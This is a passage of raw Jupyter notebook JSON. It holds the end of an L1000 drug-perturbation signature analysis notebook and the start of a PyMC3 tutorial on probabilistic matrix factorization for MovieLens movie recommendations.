(df.loc[top_index].sum()>0).sum() < len(df.columns):\n blank = df.loc[top_index].sum()==0\n blank_indices = [i for i in blank.index if blank[i]]\n top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]\n top_df = df.loc[top_index]\n consensus_norm = quantile_normalize(top_df)\n display(Markdown(\"##### Clustergrammer for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-clustergrammer-%s\"%(alternate, lib))\n label = \"Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"clustergrammer_%s_%s.tsv\"%(library.replace(\" \", \"_\"), direction)\n figure = clustergrammer(consensus_norm, name, figure, label)\n\n display(Markdown(\"#### Heatmap for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-heatmap-%s\"%(alternate, lib))\n label = \"Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"heatmap_%s_%s.png\"%(library.replace(\" \", \"_\"), direction)\n figure = heatmap(consensus_norm, name, figure, label)\n\n df = df[(df>0).sum(1) >= min_sigs]\n if consensus_method == 'z-score':\n df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]\n else:\n df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]\n \n if lib in gene_page:\n# \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n# \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n# \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n# \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert time\", \"cell line\", \"count\", \"z-sum\", \"Enrichr gene page\"])\n stat_df['count'] = (df > 0).sum(1)\n # Compute zstat and p value\n stat_df[\"z-sum\"] = df.sum(1)\n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df['Enrichr gene page'] = [\"https://maayanlab.cloud/Enrichr/#find!gene=%s\"%i for i in stat_df[\"pert name\"]]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(lib.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)\n stat_html = stat_df.head(25).to_html(escape=False)\n 
display(HTML(stat_html))\n else:\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert dose\", \"pert time\", \"cell line\", \"count\", \"z-sum\"])\n stat_df['count'] = (df > 0).sum(1)\n stat_df[\"z-sum\"] = df.sum(1)\n \n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert dose\"] = metadata[i][\"pert_dose\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n display(stat_df.head(25))\n display(Markdown(\"**Table %d** Top 25 consensus %s %s signatures([download](./%s))\"%\n (table, alternate, labeller[lib], filename)))\n\n table+=1\n\n \n# display(df.head())\n# display(Markdown(\"**Table %d** Consensus %s %s signatures ([download](./%s))\"%\n# (table, alternate, labeller[lib], filename)))\n\n# table+=1\n if len(set(stat_df[\"pert name\"])) > 5:\n if lib in drug_page:\n display(Markdown(\"#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n for d in drugmonizome_datasets:\n label = \"%s top ranked enriched terms for %s %s perturbagens\"%(d.replace(\"_\", \" \"), alternate, labeller[lib])\n figure = get_drugmonizome_plot(stat_df, label, figure, d)\n elif lib in gene_page:\n display(Markdown(\"#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n label = \"%s L1000 %s perturbagens\"%(alternate, labeller[lib])\n figure = enrichment(stat_df, label, figure)",
"_____no_output_____"
]
],
[
[
"### Reversers",
"_____no_output_____"
]
],
[
[
"direction = \"reversers\"\nalternate = \"reversing\"\nfor lib in datasets:\n library = dataset_map[lib]\n display(Markdown(\"#### Consensus %s %s signatures\"%(alternate, labeller[lib])), display_id=alternate+lib)\n index = set()\n sig_dict = enriched[direction][lib]\n for v in sig_dict.values():\n index = index.union(v.keys())\n df = pd.DataFrame(0, index=index, columns=sig_dict.keys())\n for sig_name,v in sig_dict.items():\n for local_id, meta in v.items():\n df.at[local_id, sig_name] = meta[score_field]\n filename = \"sig_matrix_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n df.to_csv(filename, sep=\"\\t\")\n display(Markdown(\"Download score matrix for %s %s signatures ([download](./%s))\"%\n (alternate, labeller[lib], filename)))\n if len(df.index) > 1 and len(df.columns) > 1:\n top_index = df.index\n if len(top_index) > top_n_signatures:\n top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index\n top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]\n if (df.loc[top_index].sum()>0).sum() < len(df.columns):\n blank = df.loc[top_index].sum()==0\n blank_indices = [i for i in blank.index if blank[i]]\n top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]\n top_df = df.loc[top_index]\n consensus_norm = quantile_normalize(top_df)\n display(Markdown(\"##### Clustergrammer for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-clustergrammer-%s\"%(alternate, lib))\n label = \"Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"clustergrammer_%s_%s.tsv\"%(library.replace(\" \", \"_\"), direction)\n figure = clustergrammer(consensus_norm, name, figure, label)\n\n display(Markdown(\"#### Heatmap for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-heatmap-%s\"%(alternate, lib))\n label = \"Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"heatmap_%s_%s.png\"%(library.replace(\" \", \"_\"), direction)\n figure = heatmap(consensus_norm, name, figure, label)\n\n df = df[(df>0).sum(1) >= min_sigs]\n if consensus_method == 'z-score':\n df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]\n else:\n df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]\n \n if lib in gene_page:\n# \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n# \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n# \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n# \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert time\", \"cell line\", \"count\", \"z-sum\", \"Enrichr gene page\"])\n stat_df['count'] = (df > 0).sum(1)\n # Compute zstat and p value\n stat_df[\"z-sum\"] = df.sum(1)\n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df['Enrichr gene page'] = [\"https://maayanlab.cloud/Enrichr/#find!gene=%s\"%i for i in stat_df[\"pert name\"]]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(lib.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)\n stat_html = stat_df.head(25).to_html(escape=False)\n 
display(HTML(stat_html))\n else:\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert dose\", \"pert time\", \"cell line\", \"count\", \"z-sum\"])\n stat_df['count'] = (df > 0).sum(1)\n stat_df[\"z-sum\"] = df.sum(1)\n \n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert dose\"] = metadata[i][\"pert_dose\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n display(stat_df.head(25))\n display(Markdown(\"**Table %d** Top 25 consensus %s %s signatures([download](./%s))\"%\n (table, alternate, labeller[lib], filename)))\n\n table+=1\n\n \n# display(df.head())\n# display(Markdown(\"**Table %d** Consensus %s %s signatures ([download](./%s))\"%\n# (table, alternate, labeller[lib], filename)))\n\n# table+=1\n if len(set(stat_df[\"pert name\"])) > 5:\n if lib in drug_page:\n display(Markdown(\"#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n for d in drugmonizome_datasets:\n label = \"%s top ranked enriched terms for %s %s perturbagens\"%(d.replace(\"_\", \" \"), alternate, labeller[lib])\n figure = get_drugmonizome_plot(stat_df, label, figure, d)\n elif lib in gene_page:\n display(Markdown(\"#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n label = \"%s L1000 %s perturbagens\"%(alternate, labeller[lib])\n figure = enrichment(stat_df, label, figure)",
"_____no_output_____"
]
],
[
[
"## References\n[1] Subramanian, A., Narayan, R., Corsello, S. M., Peck, D. D., Natoli, T. E., Lu, X., ... & Golub, T. R. (2017). A next generation connectivity map: L1000 platform and the first 1,000,000 profiles. Cell, 171(6), 1437-1452.\n\n[2] Fernandez, N. F., Gundersen, G. W., Rahman, A., Grimes, M. L., Rikova, K., Hornbeck, P., & Ma’ayan, A. (2017). Clustergrammer, a web-based heatmap visualization and analysis tool for high-dimensional biological data. Scientific data, 4(1), 1-12.\n\n[3] Chen, E. Y., Tan, C. M., Kou, Y., Duan, Q., Wang, Z., Meirelles, G. V., ... & Ma’ayan, A. (2013). Enrichr: interactive and collaborative HTML5 gene list enrichment analysis tool. BMC bioinformatics, 14(1), 1-14.\n\n[4] Kuleshov, Maxim V., et al. \"Enrichr: a comprehensive gene set enrichment analysis web server 2016 update.\" Nucleic acids research 44.W1 (2016): W90-W97.\n\n[5] Xie, Z., Bailey, A., Kuleshov, M. V., Clarke, D. J., Evangelista, J. E., Jenkins, S. L., ... & Ma'ayan, A. (2021). Gene set knowledge discovery with Enrichr. Current protocols, 1(3), e90.\n\n[6] Kropiwnicki, E., Evangelista, J. E., Stein, D. J., Clarke, D. J., Lachmann, A., Kuleshov, M. V., ... & Ma’ayan, A. (2021). Drugmonizome and Drugmonizome-ML: integration and abstraction of small molecule attributes for drug enrichment analysis and machine learning. Database, 2021.\n\n[7] Maglott, D., Ostell, J., Pruitt, K. D., & Tatusova, T. (2005). Entrez Gene: gene-centered information at NCBI. Nucleic acids research, 33(suppl_1), D54-D58.\n\n[8] Brown, G. R., Hem, V., Katz, K. S., Ovetsky, M., Wallin, C., Ermolaeva, O., ... & Murphy, T. D. (2015). Gene: a gene-centered information resource at NCBI. Nucleic acids research, 43(D1), D36-D42.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2b8254263f43b24fc0c51940254fadb2126b7b | 569,323 | ipynb | Jupyter Notebook | examples/case_studies/probabilistic_matrix_factorization.ipynb | ltoniazzi/pymc-examples | 6b66c620afbbfc37ea4b90aa907e07918b51b0c1 | [
"MIT"
] | 1 | 2022-01-30T15:59:32.000Z | 2022-01-30T15:59:32.000Z | examples/case_studies/probabilistic_matrix_factorization.ipynb | chiral-carbon/pymc-examples | 6a23dba3ba74199cc10b7fc647761e82328edcf2 | [
"MIT"
] | null | null | null | examples/case_studies/probabilistic_matrix_factorization.ipynb | chiral-carbon/pymc-examples | 6a23dba3ba74199cc10b7fc647761e82328edcf2 | [
"MIT"
] | 1 | 2021-05-12T02:22:41.000Z | 2021-05-12T02:22:41.000Z | 304.940011 | 123,856 | 0.9036 | [
[
[
"# Probabilistic Matrix Factorization for Making Personalized Recommendations",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\n\nfrom matplotlib import pyplot as plt\n\nplt.style.use(\"seaborn-darkgrid\")\nprint(f\"Running on PyMC3 v{pm.__version__}\")",
"Running on PyMC3 v3.11.0\n"
]
],
[
[
"## Motivation\n\nSo you are browsing for something to watch on Netflix and just not liking the suggestions. You just know you can do better. All you need to do is collect some ratings data from yourself and friends and build a recommendation algorithm. This notebook will guide you in doing just that!\n\nWe'll start out by getting some intuition for how our model will work. Then we'll formalize our intuition. Afterwards, we'll examine the dataset we are going to use. Once we have some notion of what our data looks like, we'll define some baseline methods for predicting preferences for movies. Following that, we'll look at Probabilistic Matrix Factorization (PMF), which is a more sophisticated Bayesian method for predicting preferences. Having detailed the PMF model, we'll use PyMC3 for MAP estimation and MCMC inference. Finally, we'll compare the results obtained with PMF to those obtained from our baseline methods and discuss the outcome.\n\n## Intuition\n\nNormally if we want recommendations for something, we try to find people who are similar to us and ask their opinions. If Bob, Alice, and Monty are all similar to me, and they all like crime dramas, I'll probably like crime dramas. Now this isn't always true. It depends on what we consider to be \"similar\". In order to get the best bang for our buck, we really want to look for people who have the most similar taste. Taste being a complex beast, we'd probably like to break it down into something more understandable. We might try to characterize each movie in terms of various factors. Perhaps films can be moody, light-hearted, cinematic, dialogue-heavy, big-budget, etc. Now imagine we go through IMDB and assign each movie a rating in each of the categories. How moody is it? How much dialogue does it have? What's its budget? Perhaps we use numbers between 0 and 1 for each category. Intuitively, we might call this the film's profile.\n\nNow let's suppose we go back to those 5 movies we rated. At this point, we can get a richer picture of our own preferences by looking at the film profiles of each of the movies we liked and didn't like. Perhaps we take the averages across the 5 film profiles and call this our ideal type of film. In other words, we have computed some notion of our inherent _preferences_ for various types of movies. Suppose Bob, Alice, and Monty all do the same. Now we can compare our preferences and determine how similar each of us really are. I might find that Bob is the most similar and the other two are still more similar than other people, but not as much as Bob. So I want recommendations from all three people, but when I make my final decision, I'm going to put more weight on Bob's recommendation than those I get from Alice and Monty.\n\nWhile the above procedure sounds fairly effective as is, it also reveals an unexpected additional source of information. If we rated a particular movie highly, and we know its film profile, we can compare with the profiles of other movies. If we find one with very close numbers, it is probable we'll also enjoy this movie. Both this approach and the one above are commonly known as _neighborhood approaches_. Techniques that leverage both of these approaches simultaneously are often called _collaborative filtering_ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf). The first approach we talked about uses user-user similarity, while the second uses item-item similarity. Ideally, we'd like to use both sources of information. 
The idea is we have a lot of items available to us, and we'd like to work together with others to filter the list of items down to those we'll each like best. My list should have the items I'll like best at the top and those I'll like least at the bottom. Everyone else wants the same. If I get together with a bunch of other people, we all watch 5 movies, and we have some efficient computational process to determine similarity, we can very quickly order the movies to our liking.\n\n## Formalization\n\nLet's take some time to make the intuitive notions we've been discussing more concrete. We have a set of $M$ movies, or _items_ ($M = 100$ in our example above). We also have $N$ people, whom we'll call _users_ of our recommender system. For each item, we'd like to find a $D$ dimensional factor composition (film profile above) to describe the item. Ideally, we'd like to do this without actually going through and manually labeling all of the movies. Manual labeling would be both slow and error-prone, as different people will likely label movies differently. So we model each movie as a $D$ dimensional vector, which is its latent factor composition. Furthermore, we expect each user to have some preferences, but without our manual labeling and averaging procedure, we have to rely on the latent factor compositions to learn $D$ dimensional latent preference vectors for each user. The only thing we get to observe is the $N \\times M$ ratings matrix $R$ provided by the users. Entry $R_{ij}$ is the rating user $i$ gave to item $j$. Many of these entries may be missing, since most users will not have rated all 100 movies. Our goal is to fill in the missing values with predicted ratings based on the latent variables $U$ and $V$. We denote the predicted ratings by $R_{ij}^*$. We also define an indicator matrix $I$, with entry $I_{ij} = 0$ if $R_{ij}$ is missing and $I_{ij} = 1$ otherwise.\n\nSo we have an $N \\times D$ matrix of user preferences which we'll call $U$ and an $M \\times D$ factor composition matrix we'll call $V$. We also have a $N \\times M$ rating matrix we'll call $R$. We can think of each row $U_i$ as indications of how much each user prefers each of the $D$ latent factors. Each row $V_j$ can be thought of as how much each item can be described by each of the latent factors. In order to make a recommendation, we need a suitable prediction function which maps a user preference vector $U_i$ and an item latent factor vector $V_j$ to a predicted ranking. The choice of this prediction function is an important modeling decision, and a variety of prediction functions have been used. Perhaps the most common is the dot product of the two vectors, $U_i \\cdot V_j$ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf).\n\nTo better understand CF techniques, let us explore a particular example. Imagine we are seeking to recommend movies using a model which infers five latent factors, $V_j$, for $j = 1,2,3,4,5$. In reality, the latent factors are often unexplainable in a straightforward manner, and most models make no attempt to understand what information is being captured by each factor. However, for the purposes of explanation, let us assume the five latent factors might end up capturing the film profile we were discussing above. So our five latent factors are: moody, light-hearted, cinematic, dialogue, and budget. Then for a particular user $i$, imagine we infer a preference vector $U_i = <0.5, 0.1, 1.5, 1.1, 0.3>$. 
Also, for a particular item $j$, we infer these values for the latent factors: $V_j = <0.5, 1.5, 1.25, 0.8, 0.9>$. Using the dot product as the prediction function, we would calculate 3.425 as the ranking for that item, which is more or less a neutral preference given our 1 to 5 rating scale.\n\n$$ 0.5 \\times 0.5 + 0.1 \\times 1.5 + 1.5 \\times 1.25 + 1.1 \\times 0.8 + 0.3 \\times 0.9 = 3.425 $$",
"_____no_output_____"
],
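As a quick arithmetic check, the same prediction can be computed with NumPy; the two vectors below are the illustrative numbers from the example, not values learned from any data:

```python
import numpy as np

U_i = np.array([0.5, 0.1, 1.5, 1.1, 0.3])   # user i's latent preference vector
V_j = np.array([0.5, 1.5, 1.25, 0.8, 0.9])  # item j's latent factor composition

print(U_i @ V_j)  # dot-product prediction function -> 3.425
```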
[
"## Data\n\nThe [MovieLens 100k dataset](https://grouplens.org/datasets/movielens/100k/) was collected by the GroupLens Research Project at the University of Minnesota. This data set consists of 100,000 ratings (1-5) from 943 users on 1682 movies. Each user rated at least 20 movies, and be have basic information on the users (age, gender, occupation, zip). Each movie includes basic information like title, release date, video release date, and genre. We will implement a model that is suitable for collaborative filtering on this data and evaluate it in terms of root mean squared error (RMSE) to validate the results.\n\nThe data was collected through the MovieLens web site\n(movielens.umn.edu) during the seven-month period from September 19th,\n1997 through April 22nd, 1998. This data has been cleaned up - users\nwho had less than 20 ratings or did not have complete demographic\ninformation were removed from this data set.\n\n\nLet's begin by exploring our data. We want to get a general feel for what it looks like and a sense for what sort of patterns it might contain. Here are the user rating data:",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv(\n pm.get_data(\"ml_100k_u.data\"), sep=\"\\t\", names=[\"userid\", \"itemid\", \"rating\", \"timestamp\"]\n)\ndata.head()",
"_____no_output_____"
]
],
[
[
"And here is the movie detail data:",
"_____no_output_____"
]
],
[
[
"# fmt: off\nmovie_columns = ['movie id', 'movie title', 'release date', 'video release date', 'IMDb URL', \n 'unknown','Action','Adventure', 'Animation',\"Children's\", 'Comedy', 'Crime',\n 'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery',\n 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']\n# fmt: on\nmovies = pd.read_csv(\n pm.get_data(\"ml_100k_u.item\"),\n sep=\"|\",\n names=movie_columns,\n index_col=\"movie id\",\n parse_dates=[\"release date\"],\n)\nmovies.head()",
"_____no_output_____"
],
[
"# Extract the ratings from the DataFrame\nratings = data.rating\n\n# Plot histogram\ndata.groupby(\"rating\").size().plot(kind=\"bar\");",
"_____no_output_____"
],
[
"data.rating.describe()",
"_____no_output_____"
]
],
[
[
"This must be a decent batch of movies. From our exploration above, we know most ratings are in the range 3 to 5, and positive ratings are more likely than negative ratings. Let's look at the means for each movie to see if we have any particularly good (or bad) movie here.\n",
"_____no_output_____"
]
],
[
[
"movie_means = data.join(movies[\"movie title\"], on=\"itemid\").groupby(\"movie title\").rating.mean()\nmovie_means[:50].plot(kind=\"bar\", grid=False, figsize=(16, 6), title=\"Mean ratings for 50 movies\");",
"_____no_output_____"
]
],
[
[
"While the majority of the movies generally get positive feedback from users, there are definitely a few that stand out as bad. Let's take a look at the worst and best movies, just for fun:",
"_____no_output_____"
]
],
[
[
"fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(16, 4), sharey=True)\nmovie_means.nlargest(30).plot(kind=\"bar\", ax=ax1, title=\"Top 30 movies in data set\")\nmovie_means.nsmallest(30).plot(kind=\"bar\", ax=ax2, title=\"Bottom 30 movies in data set\");",
"_____no_output_____"
]
],
[
[
"Make sense to me. We now know there are definite popularity differences between the movies. Some of them are simply better than others, and some are downright lousy. Looking at the movie means allowed us to discover these general trends. Perhaps there are similar trends across users. It might be the case that some users are simply more easily entertained than others. Let's take a look.",
"_____no_output_____"
]
],
[
[
"user_means = data.groupby(\"userid\").rating.mean().sort_values()\n_, ax = plt.subplots(figsize=(16, 6))\nax.plot(np.arange(len(user_means)), user_means.values, \"k-\")\n\nax.fill_between(np.arange(len(user_means)), user_means.values, alpha=0.3)\nax.set_xticklabels(\"\")\n# 1000 labels is nonsensical\nax.set_ylabel(\"Rating\")\nax.set_xlabel(f\"{len(user_means)} average ratings per user\")\nax.set_ylim(0, 5)\nax.set_xlim(0, len(user_means));",
"_____no_output_____"
]
],
[
[
"We see even more significant trends here. Some users rate nearly everything highly, and some (though not as many) rate nearly everything negatively. These observations will come in handy when considering models to use for predicting user preferences on unseen movies.",
"_____no_output_____"
],
[
"## Methods\n\nHaving explored the data, we're now ready to dig in and start addressing the problem. We want to predict how much each user is going to like all of the movies he or she has not yet read.\n\n\n### Baselines\n\nEvery good analysis needs some kind of baseline methods to compare against. It's difficult to claim we've produced good results if we have no reference point for what defines \"good\". We'll define three very simple baseline methods and find the RMSE using these methods. Our goal will be to obtain lower RMSE scores with whatever model we produce.\n\n#### Uniform Random Baseline\n\nOur first baseline is about as dead stupid as you can get. Every place we see a missing value in $R$, we'll simply fill it with a number drawn uniformly at random in the range [1, 5]. We expect this method to do the worst by far.\n\n$$R_{ij}^* \\sim Uniform$$\n\n#### Global Mean Baseline\n\nThis method is only slightly better than the last. Wherever we have a missing value, we'll fill it in with the mean of all observed ratings.\n\n$$\\text{global_mean} = \\frac{1}{N \\times M} \\sum_{i=1}^N \\sum_{j=1}^M I_{ij}(R_{ij})$$\n\n$$R_{ij}^* = \\text{global_mean}$$\n\n#### Mean of Means Baseline\n\nNow we're going to start getting a bit smarter. We imagine some users might be easily amused, and inclined to rate all movies more highly. Other users might be the opposite. Additionally, some movies might simply be more witty than others, so all users might rate some movies more highly than others in general. We can clearly see this in our graph of the movie means above. We'll attempt to capture these general trends through per-user and per-movie rating means. We'll also incorporate the global mean to smooth things out a bit. So if we see a missing value in cell $R_{ij}$, we'll average the global mean with the mean of $U_i$ and the mean of $V_j$ and use that value to fill it in.\n\n$$\\text{user_means} = \\frac{1}{M} \\sum_{j=1}^M I_{ij}(R_{ij})$$\n\n$$\\text{movie_means} = \\frac{1}{N} \\sum_{i=1}^N I_{ij}(R_{ij})$$\n\n$$R_{ij}^* = \\frac{1}{3} \\left(\\text{user_means}_i + \\text{ movie_means}_j + \\text{ global_mean} \\right)$$\n",
"_____no_output_____"
]
],
[
[
"# Create a base class with scaffolding for our 3 baselines.\n\n\ndef split_title(title):\n \"\"\"Change \"BaselineMethod\" to \"Baseline Method\".\"\"\"\n words = []\n tmp = [title[0]]\n for c in title[1:]:\n if c.isupper():\n words.append(\"\".join(tmp))\n tmp = [c]\n else:\n tmp.append(c)\n words.append(\"\".join(tmp))\n return \" \".join(words)\n\n\nclass Baseline:\n \"\"\"Calculate baseline predictions.\"\"\"\n\n def __init__(self, train_data):\n \"\"\"Simple heuristic-based transductive learning to fill in missing\n values in data matrix.\"\"\"\n self.predict(train_data.copy())\n\n def predict(self, train_data):\n raise NotImplementedError(\"baseline prediction not implemented for base class\")\n\n def rmse(self, test_data):\n \"\"\"Calculate root mean squared error for predictions on test data.\"\"\"\n return rmse(test_data, self.predicted)\n\n def __str__(self):\n return split_title(self.__class__.__name__)\n\n\n# Implement the 3 baselines.\n\n\nclass UniformRandomBaseline(Baseline):\n \"\"\"Fill missing values with uniform random values.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n masked_train = np.ma.masked_array(train_data, nan_mask)\n pmin, pmax = masked_train.min(), masked_train.max()\n N = nan_mask.sum()\n train_data[nan_mask] = np.random.uniform(pmin, pmax, N)\n self.predicted = train_data\n\n\nclass GlobalMeanBaseline(Baseline):\n \"\"\"Fill in missing values using the global mean.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n train_data[nan_mask] = train_data[~nan_mask].mean()\n self.predicted = train_data\n\n\nclass MeanOfMeansBaseline(Baseline):\n \"\"\"Fill in missing values using mean of user/item/global means.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n masked_train = np.ma.masked_array(train_data, nan_mask)\n global_mean = masked_train.mean()\n user_means = masked_train.mean(axis=1)\n item_means = masked_train.mean(axis=0)\n self.predicted = train_data.copy()\n n, m = train_data.shape\n for i in range(n):\n for j in range(m):\n if np.ma.isMA(item_means[j]):\n self.predicted[i, j] = np.mean((global_mean, user_means[i]))\n else:\n self.predicted[i, j] = np.mean((global_mean, user_means[i], item_means[j]))\n\n\nbaseline_methods = {}\nbaseline_methods[\"ur\"] = UniformRandomBaseline\nbaseline_methods[\"gm\"] = GlobalMeanBaseline\nbaseline_methods[\"mom\"] = MeanOfMeansBaseline",
"_____no_output_____"
],
[
"num_users = data.userid.unique().shape[0]\nnum_items = data.itemid.unique().shape[0]\nsparsity = 1 - len(data) / (num_users * num_items)\nprint(f\"Users: {num_users}\\nMovies: {num_items}\\nSparsity: {sparsity}\")\n\ndense_data = data.pivot(index=\"userid\", columns=\"itemid\", values=\"rating\").values",
"Users: 943\nMovies: 1682\nSparsity: 0.9369533063577546\n"
]
],
[
[
"## Probabilistic Matrix Factorization\n\n[Probabilistic Matrix Factorization (PMF)](http://papers.nips.cc/paper/3208-probabilistic-matrix-factorization.pdf) [3] is a probabilistic approach to the collaborative filtering problem that takes a Bayesian perspective. The ratings $R$ are modeled as draws from a Gaussian distribution. The mean for $R_{ij}$ is $U_i V_j^T$. The precision $\\alpha$ is a fixed parameter that reflects the uncertainty of the estimations; the normal distribution is commonly reparameterized in terms of precision, which is the inverse of the variance. Complexity is controlled by placing zero-mean spherical Gaussian priors on $U$ and $V$. In other words, each row of $U$ is drawn from a multivariate Gaussian with mean $\\mu = 0$ and precision which is some multiple of the identity matrix $I$. Those multiples are $\\alpha_U$ for $U$ and $\\alpha_V$ for $V$. So our model is defined by:\n\n$\\newcommand\\given[1][]{\\:#1\\vert\\:}$\n\n$$\nP(R \\given U, V, \\alpha^2) = \n \\prod_{i=1}^N \\prod_{j=1}^M\n \\left[ \\mathcal{N}(R_{ij} \\given U_i V_j^T, \\alpha^{-1}) \\right]^{I_{ij}}\n$$\n\n$$\nP(U \\given \\alpha_U^2) =\n \\prod_{i=1}^N \\mathcal{N}(U_i \\given 0, \\alpha_U^{-1} \\boldsymbol{I})\n$$\n\n$$\nP(V \\given \\alpha_U^2) =\n \\prod_{j=1}^M \\mathcal{N}(V_j \\given 0, \\alpha_V^{-1} \\boldsymbol{I})\n$$\n\nGiven small precision parameters, the priors on $U$ and $V$ ensure our latent variables do not grow too far from 0. This prevents overly strong user preferences and item factor compositions from being learned. This is commonly known as complexity control, where the complexity of the model here is measured by the magnitude of the latent variables. Controlling complexity like this helps prevent overfitting, which allows the model to generalize better for unseen data. We must also choose an appropriate $\\alpha$ value for the normal distribution for $R$. So the challenge becomes choosing appropriate values for $\\alpha_U$, $\\alpha_V$, and $\\alpha$. This challenge can be tackled with the soft weight-sharing methods discussed by [Nowland and Hinton, 1992](http://www.cs.toronto.edu/~fritz/absps/sunspots.pdf) [4]. However, for the purposes of this analysis, we will stick to using point estimates obtained from our data.",
"_____no_output_____"
]
],
[
[
"import logging\nimport time\n\nimport scipy as sp\nimport theano\n\n# Enable on-the-fly graph computations, but ignore\n# absence of intermediate test values.\ntheano.config.compute_test_value = \"ignore\"\n\n# Set up logging.\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass PMF:\n \"\"\"Probabilistic Matrix Factorization model using pymc3.\"\"\"\n\n def __init__(self, train, dim, alpha=2, std=0.01, bounds=(1, 5)):\n \"\"\"Build the Probabilistic Matrix Factorization model using pymc3.\n\n :param np.ndarray train: The training data to use for learning the model.\n :param int dim: Dimensionality of the model; number of latent factors.\n :param int alpha: Fixed precision for the likelihood function.\n :param float std: Amount of noise to use for model initialization.\n :param (tuple of int) bounds: (lower, upper) bound of ratings.\n These bounds will simply be used to cap the estimates produced for R.\n\n \"\"\"\n self.dim = dim\n self.alpha = alpha\n self.std = np.sqrt(1.0 / alpha)\n self.bounds = bounds\n self.data = train.copy()\n n, m = self.data.shape\n\n # Perform mean value imputation\n 